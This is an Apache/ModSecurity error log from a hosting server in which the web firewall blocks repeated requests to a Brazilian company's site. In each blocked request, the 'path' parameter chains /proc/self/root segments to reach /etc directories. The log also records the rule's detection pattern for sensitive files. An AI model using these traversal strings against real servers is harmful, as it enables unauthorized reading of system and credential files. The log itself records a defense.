[Tue Mar 17 20:52:10.454911 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:52528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpKoh-PF_25v4hFRCRFQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:12.565671 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:52532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpLMdf6f5d65gmYZRi-gAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:14.058498 2026] [:error] [pid 11088:tid 140411632822016] [client 74.7.241.31:52538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpLmmqtCojLHvu5cKPcQAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:27.457844 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44042] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:52:27.527522 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:55886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpO4h-PF_25v4hFRCRHgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:29.065866 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:55890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpPRj0p0SRWAqcjGGgTgAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:30.567958 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:55904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpPtY0UrI5A3LftIwl7QAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:32.074968 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:55912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpQOyqAr6etmhZHNpNKwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:32.585283 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.243.128:38354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpQBj0p0SRWAqcjGGgUQAAAwI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:52:33.667675 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:55922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpQYh-PF_25v4hFRCRJAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:35.094724 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.241.31:55936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpQ3Ik7brgkOH-rIWy8gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:36.591106 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:55950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpRIh-PF_25v4hFRCRJgAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:50.129000 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:52:51.487007 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:46768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpU4h-PF_25v4hFRCRMAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:53.569070 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:46778] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpVYh-PF_25v4hFRCRNAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:52:55.825621 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:46788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpV4h-PF_25v4hFRCROAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:52:55.826041 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:57090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpV-w_le52K8_3pV1zSQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:53:12.121806 2026] [proxy_fcgi:error] [pid 6296:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:53:13.155918 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:46790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpacdf6f5d65gmYZRjEwAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:14.824912 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:38098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpahj0p0SRWAqcjGGgZAAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:18.605910 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:38110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpbdY0UrI5A3LftIwl-gAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:19.997683 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:55034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpb9Y0UrI5A3LftIwl_AAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:53:20.759488 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:57090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpcOw_le52K8_3pV1zXQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:53:21.380677 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:55036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpcdY0UrI5A3LftIwmAAAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:53:22.846488 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:55050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpcsdf6f5d65gmYZRjFgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
